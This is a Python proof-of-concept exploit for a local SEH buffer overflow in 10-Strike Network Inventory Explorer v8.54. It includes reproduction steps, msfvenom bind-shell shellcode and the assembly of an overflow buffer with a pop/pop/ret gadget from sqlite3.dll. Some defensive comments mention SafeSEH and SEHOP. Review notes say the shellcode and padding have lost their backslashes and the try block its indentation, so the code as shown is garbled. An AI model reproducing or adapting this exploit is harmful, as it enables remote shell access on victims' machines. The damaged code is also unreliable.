#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : https://www.10-strike.com/ #
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published

'''
Steps to reproduce:
===================
- Under Help, click 'Enter Registration Key'.
- Paste the contents of Evil.txt and click OK.
Notes:
======
- The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
- There is ample space prior to SEH overwrite.
- Pro edition is affected as well.
'''

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b 'x00x0ax0d' -f python -v shellcode
#Payload size: 355 bytes
# Second stage of the proof of concept: a msfvenom-generated bind-shell stub, encoded to
# avoid the bad characters listed in the command above, built up one string chunk at a time.
# NOTE(review): as reproduced on this page the hex escapes (and the bad-character list in the
# msfvenom command) have lost their backslashes, so every chunk below is plain ASCII text
# rather than the 355 raw bytes the "Payload size" comment claims.  len(shellcode) is
# therefore much larger than 355, which also skews the padding arithmetic in the buffer
# assembly further down.  Left byte-identical here; the page does not show the original form.
shellcode = ""
shellcode += "xbfxadxa8x1ex44xddxc0xd9x74x24xf4x5e"
shellcode += "x2bxc9xb1x53x83xc6x04x31x7ex0ex03xd3"
shellcode += "xa6xfcxb1xd7x5fx82x3ax27xa0xe3xb3xc2"
shellcode += "x91x23xa7x87x82x93xa3xc5x2ex5fxe1xfd"
shellcode += "xa5x2dx2exf2x0ex9bx08x3dx8exb0x69x5c"
shellcode += "x0cxcbxbdxbex2dx04xb0xbfx6ax79x39xed"
shellcode += "x23xf5xecx01x47x43x2dxaax1bx45x35x4f"
shellcode += "xebx64x14xdex67x3fxb6xe1xa4x4bxffxf9"
shellcode += "xa9x76x49x72x19x0cx48x52x53xedxe7x9b"
shellcode += "x5bx1cxf9xdcx5cxffx8cx14x9fx82x96xe3"
shellcode += "xddx58x12xf7x46x2ax84xd3x77xffx53x90"
shellcode += "x74xb4x10xfex98x4bxf4x75xa4xc0xfbx59"
shellcode += "x2cx92xdfx7dx74x40x41x24xd0x27x7ex36"
shellcode += "xbbx98xdax3dx56xccx56x1cx3fx21x5bx9e"
shellcode += "xbfx2dxecxedx8dxf2x46x79xbex7bx41x7e"
shellcode += "xc1x51x35x10x3cx5ax46x39xfbx0ex16x51"
shellcode += "x2ax2fxfdxa1xd3xfax68xa9x72x55x8fx54"
shellcode += "xc4x05x0fxf6xadx4fx80x29xcdx6fx4ax42"
shellcode += "x66x92x75x7dx2bx1bx93x17xc3x4dx0bx8f"
shellcode += "x21xaax84x28x59x98xbcxdex12xcax7bxe1"
shellcode += "xa2xd8x2bx75x29x0fxe8x64x2ex1ax58xf1"
shellcode += "xb9xd0x09xb0x58xe4x03x22xf8x77xc8xb2"
shellcode += "x77x64x47xe5xd0x5ax9ex63xcdxc5x08x91"
shellcode += "x0cx93x73x11xcbx60x7dx98x9exddx59x8a"
shellcode += "x66xddxe5xfex36x88xb3xa8xf0x62x72x02"
shellcode += "xabxd9xdcxc2x2ax12xdfx94x32x7fxa9x78"
shellcode += "x82xd6xecx87x2bxbfxf8xf0x51x5fx06x2b"
shellcode += "xd2x6fx4dx71x73xf8x08xe0xc1x65xabxdf"
shellcode += "x06x90x28xd5xf6x67x30x9cxf3x2cxf6x4d"
shellcode += "x8ex3dx93x71x3dx3dxb6"

# Assemble the 5000-byte registration-key string that triggers the overflow.  The layout is
# the classic SEH-overwrite shape: filler up to the next-SEH pointer, a short forward jump in
# nSEH, a pop/pop/ret gadget as the handler address, a small NOP sled, then the payload.
# Defensive note: the chain only works because the gadget lives in a module shipped without
# SafeSEH/ASLR (see the Notes block above); SEHOP, where enabled on the host, validates the
# handler chain and is the standard system-level mitigation for this technique.  A hardened
# build would also bound the registration-key length before copying it.
# NOTE(review): the 'x41'/'x90' and address literals have lost their backslashes in this copy,
# so the lengths below are the per-chunk string lengths, not single bytes; the final padding
# expression can go negative and yield an empty string.  Left byte-identical.
buffer = 'x41' * 4188 # filler to nSEH
buffer += 'x75x06x74x06' # nSEH | jump net
buffer += 'x7ax49xe8x61' # SEH | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
buffer += 'x90' * 8 # nops
buffer += shellcode # bind shell
buffer += 'x41' * (5000-4188-16-len(shellcode)) # junk

# Write the assembled buffer to Evil.txt in the current working directory and report its size.
# Python 2 print statements throughout, matching the #!/usr/bin/python shebang.
# NOTE(review): the body lines of this try/except have lost their indentation in this copy, so
# the script as shown would not parse; the intended structure is a single try around the file
# write with a catch-all handler that only prints the error and continues.
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
# Broad catch: any failure (permissions, disk) is printed and swallowed rather than re-raised.
print e